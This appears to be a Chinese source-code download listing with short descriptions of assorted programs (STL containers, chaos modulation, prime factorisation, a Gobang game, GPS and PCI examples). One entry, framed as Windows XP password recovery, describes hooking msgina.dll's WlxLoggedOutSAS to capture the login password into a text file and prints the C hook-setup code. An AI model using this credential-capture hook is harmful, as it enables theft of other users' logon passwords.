-
一个STL中VECTOR的综合实例,包括vector,deque,list等类型,对于STL爱好者来说这是必须要要掌握的东西...
一个STL中VECTOR的综合实例,包括vector,deque,list等类型,对于STL爱好者来说这是必须要要掌握的东西-STL describing a comprehensive example, including vector, deque. , and other types of list for STL lovers, this is a must to master things
- 2022-04-30 04:33:03下载
- 积分:1
-
混沌移位键控
混沌调制方案的误码率与信噪比。在这里,我们用一个混沌信号调制的二进制信息和AWGN信号发送。在接收端,通过一个相干检测器检测信号,并对其进行了分析,给出了一个给定的信噪比。绘制了误码率与信噪比的曲线
- 2022-03-13 05:25:27下载
- 积分:1
-
这是一个实现质因数分解的程序,输出这个数的质因数的连乘形式...
这是一个实现质因数分解的程序,输出这个数的质因数的连乘形式-Realize this is a quality factor decomposition process, the output of the quality factor of a few even take the form of
- 2023-02-03 06:50:04下载
- 积分:1
-
这个程序将根据您的设置消耗CPU资源。
根据特定的波形类似正弦/三角波的这项计划将不断消耗的CPU资源。
- 2022-07-22 14:57:15下载
- 积分:1
-
Memories of midnight by jeffry archer
Memories of midnight by jeffry archer
- 2023-08-26 00:35:04下载
- 积分:1
-
用Visual C++写的五子棋程序,希望大家能够喜欢
用Visual C++写的五子棋程序,希望大家能够喜欢-Using Visual C++ Gobang written procedures, hope that we can love
- 2023-04-16 12:55:03下载
- 积分:1
-
一个字符串类,特点是提供了16进制打印的功能。
一个字符串类,特点是提供了16进制打印的功能。-A string class
- 2022-06-17 19:54:50下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
PCI
pci-1716数字信号采集源程序-PCI-1716 digital signal acquisition source
- 2022-06-30 00:55:58下载
- 积分:1
-
super map中例子,在vc中实现GPS定位的应用小例子。
super map中例子,在vc中实现GPS定位的应用小例子。-super map in the example, in vc realize GPS positioning in the application of small examples.
- 2022-03-04 04:14:28下载
- 积分:1